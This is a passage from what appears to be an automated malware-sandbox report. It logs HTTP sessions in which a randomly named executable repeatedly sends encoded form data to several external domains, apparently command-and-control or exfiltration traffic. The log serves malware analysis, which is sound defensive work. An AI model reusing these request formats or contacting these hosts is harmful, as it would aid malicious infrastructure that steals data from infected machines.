                                                                                  Dec 12, 2024 00:19:58.045814991 CET  1236  IN  Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 0d 0a 31 61 63 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67
                                                                                  Data Ascii: <p class="reason-text">1acThe server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items">
                                                                                  Dec 12, 2024 00:19:58.045830011 CET  161  IN  Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20
                                                                                  Data Ascii: <div class="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  21          192.168.2.5  49967        209.74.79.42    80                5884  C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  Dec 12, 2024 00:20:03.762929916 CET  758  OUT  POST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 63 63 69 4f 57 4e 6a 76 62 48 52 51 59 42 59 6d 2f 56 63 71 7a 6b 78 73 54 52 51 46 73 41 4e 79 62 6c 51 41 34 53 47 30 67 78 6f 6f 73 73 72 31 65 4e 76 77 36 64 71 53 71 58 79 67 43 49 72 47 4d 53 58 31 52 79 36 52 42 6a 64 78 73 58 63 30 69 49 62 4c 58 78 58 51 47 63 36 33 69 70 6b 75 5a 47 4f 44 35 75 73 72 55 69 34 52 77 73 62 45 6a 47 79 57 45 43 51 2f 73 6c 71 32 35 6d 73 4b 6d 70 70 66 68 5a 70 4f 55 38 5a 5a 4b 54 78 2f 4f 76 75 52 6f 48 4a 70 47 55 4e 4a 30 4a 2b 44 69 73 73 57 72 43 67 4a 57 45 47 42 69 36 35 45 2b 79 71 52 33 4b 33 49 73 4e 51 3d
                                                                                  Data Ascii: LDVlCz=24ewaC2I2P1zcciOWNjvbHRQYBYm/VcqzkxsTRQFsANyblQA4SG0gxoossr1eNvw6dqSqXygCIrGMSX1Ry6RBjdxsXc0iIbLXxXQGc63ipkuZGOD5usrUi4RwsbEjGyWECQ/slq25msKmppfhZpOU8ZZKTx/OvuRoHJpGUNJ0J+DissWrCgJWEGBi65E+yqR3K3IsNQ=
                                                                                  Dec 12, 2024 00:20:04.992533922 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  22          192.168.2.5  49974        209.74.79.42    80                5884  C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  Dec 12, 2024 00:20:06.429075003 CET  778  OUT  POST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 65 38 79 4f 52 63 6a 76 65 6e 52 52 58 68 59 6d 71 6c 63 75 7a 6b 39 73 54 51 6b 56 73 79 70 79 59 48 49 41 37 54 47 30 6e 78 6f 6f 6a 4d 72 30 44 64 75 79 36 64 32 67 71 54 79 67 43 49 2f 47 4d 58 7a 31 52 6a 36 53 42 7a 64 33 6c 33 63 36 38 34 62 4c 58 78 58 51 47 64 66 71 69 71 55 75 5a 30 61 44 34 4c 41 6f 56 69 34 53 33 73 62 45 6e 47 79 53 45 43 52 61 73 6b 6d 63 35 67 67 4b 6d 6f 35 66 68 4e 46 4e 42 4d 5a 66 4a 6a 77 67 49 4e 53 56 76 48 56 31 4c 48 6f 4a 73 71 47 32 6e 61 64 38 78 67 6f 68 46 6b 71 35 79 70 78 7a 76 43 4c 34 74 70 6e 34 79 61 48 6b 39 34 58 48 62 35 67 70 56 69 4f 48 41 73 79 70 53 47 4c 57
                                                                                  Data Ascii: LDVlCz=24ewaC2I2P1ze8yORcjvenRRXhYmqlcuzk9sTQkVsypyYHIA7TG0nxoojMr0Dduy6d2gqTygCI/GMXz1Rj6SBzd3l3c684bLXxXQGdfqiqUuZ0aD4LAoVi4S3sbEnGySECRaskmc5ggKmo5fhNFNBMZfJjwgINSVvHV1LHoJsqG2nad8xgohFkq5ypxzvCL4tpn4yaHk94XHb5gpViOHAsypSGLW
                                                                                  Dec 12, 2024 00:20:07.656577110 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  23          192.168.2.5  49980        209.74.79.42    80                5884  C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                  Dec 12, 2024 00:20:09.097485065 CET  1795  OUT  POST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 65 38 79 4f 52 63 6a 76 65 6e 52 52 58 68 59 6d 71 6c 63 75 7a 6b 39 73 54 51 6b 56 73 79 68 79 59 30 41 41 34 77 65 30 6d 78 6f 6f 71 73 72 35 44 64 75 7a 36 64 76 70 71 54 32 57 43 4f 37 47 4d 78 76 31 46 48 75 53 4b 7a 64 33 6e 33 63 33 69 49 61 44 58 78 48 63 47 63 76 71 69 71 55 75 5a 30 32 44 78 2b 73 6f 58 69 34 52 77 73 62 59 6a 47 79 71 45 43 70 67 73 6b 7a 72 34 51 41 4b 6d 4a 4a 66 67 34 70 4e 44 73 5a 64 41 7a 77 6f 49 4e 66 4c 76 48 4a 35 4c 47 63 7a 73 71 2b 32 6e 76 73 34 74 52 63 47 58 48 4f 76 37 62 70 4a 34 46 32 66 70 5a 2f 5a 77 64 2b 65 32 73 44 48 63 4a 55 6b 59 57 65 4c 53 62 37 39 57 79 7a 43 58 35 52 50 6c 41 52 37 53 51 52 57 6d 59 70 64 31 4e 4d 36 4f 2f 46 51 6a 34 37 46 34 41 66 4a 71 7a 78 37 2b 48 30 4f 75 53 62 71 42 6f 76 73 67 58 4d 76 48 71 4b 44 51 30 2b 79 49 6a 59 54 6f 4b 63 6f 63 66 44 62 4e 52 79 55 7a 75 4c 59 45 75 56 55 45 55 48 79 47 31 67 45 49 56 49 30 43 6d 32 76 78 6c 49 33 4f 6e 48 56 6b 4f 44 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz= [TRUNCATED]
                                                                                  Timestamp: Dec 12, 2024 00:20:10.574354887 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:10 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 209.74.79.42 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:11.766904116 CET | Bytes transferred: 505 | Direction: OUT | Data: GET /icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw== HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Timestamp: Dec 12, 2024 00:20:12.984282017 CET | Bytes transferred: 548 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:12 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 50001 | Destination IP: 18.139.62.226 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:19.499521017 CET | Bytes transferred: 749 | Direction: OUT | Data: POST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=1/u/r4YUMi36R90AFU0EMI4vv+jNvAyxsqV7XjerHPoiY5vf1Rc6JlDuFVgAZsJe+DBf8oqU+RbWjIB7MKUnNn8Un/NP/IDluqHOzpSftRXDJJYxiR782rnmdLlFY1gpBQ0iF4uG+43fvoy581BEME8sFoP7VrDXhOYSLQV/vxp9xIUV8b4lGLg5D/PcZXSEgQLgj8g=
                                                                                  Timestamp: Dec 12, 2024 00:20:21.104382992 CET | Bytes transferred: 362 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 50002 | Destination IP: 18.139.62.226 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:22.157824993 CET | Bytes transferred: 769 | Direction: OUT | Data: POST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=1/u/r4YUMi36QdEAHzgEb44sgejNmgz6sqZ7XnPuH98iYbHf2T06KlDuP1gFGcJA+DM18oWU+RfWjIx7N5s4M38WrfNNi4DluqHOzoyxtSnDO9kxjzD9pbnpK7lFc1gXBQ0AF8ug++zfvoC5/kBDb081BoOvEOya49EpHxk7x3t69el/m5wNVrMBTsHrInzt6zbQ9r3qtKXgj4pbOL0x4sz6c6XB
                                                                                  Timestamp: Dec 12, 2024 00:20:23.732131958 CET | Bytes transferred: 362 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50003 | Destination IP: 18.139.62.226 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:24.813807011 CET | Bytes transferred: 1786 | Direction: OUT | Data: POST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz= [TRUNCATED]
                                                                                  Timestamp: Dec 12, 2024 00:20:26.393815041 CET | Bytes transferred: 362 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 50004 | Destination IP: 18.139.62.226 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:27.474821091 CET | Bytes transferred: 502 | Direction: OUT | Data: GET /o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Timestamp: Dec 12, 2024 00:20:29.046928883 CET | Bytes transferred: 525 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50005 | Destination IP: 101.32.205.61 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:35.068353891 CET | Bytes transferred: 752 | Direction: OUT | Data: POST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=smDMOtGiFqJA1IphNX53PeUg2OvE7JTQapx164vHu5J+mmFuxj0EOyuI3GcyE2KEpqba0lfUAARmSvYnJqo6PHxsrK3sTdaHG2KN4MZj84Lg8VtExyps9FzI7UdYkkYo/zEtSzBDU0PzOJAz9bPjKRACfiXj9LOS1cl8kUrNYZcQ7Zow8dLEzYjeNDn2CtIX9K37MAQ=
                                                                                  Timestamp: Dec 12, 2024 00:20:36.572283983 CET | Bytes transferred: 708 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:36 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50006 | Destination IP: 101.32.205.61 | Destination Port: 80 | PID: 5884 | Process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp: Dec 12, 2024 00:20:37.733057976 CET | Bytes transferred: 772 | Direction: OUT | Data: POST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=smDMOtGiFqJA2p5hP253O+Uj6uvExpTUap9168XtuL9+nEduyhcENyuI8mc3HGKapqXk0gnUAG9mSvInJZA7JXxu1q2KONaHG2KN4MNN84Tg9m1EwXJr3lzHvEdY10Ys/zETSydtU37zOM8z9IXkARAAQCXx1+Td7PBXhyyuGfto3PZam/Dsg4PmdQvBTdp+npnLSXGPtxE8T1w59kIiHuT8T0aG
                                                                                  Dec 12, 2024 00:20:39.250551939 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:38 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
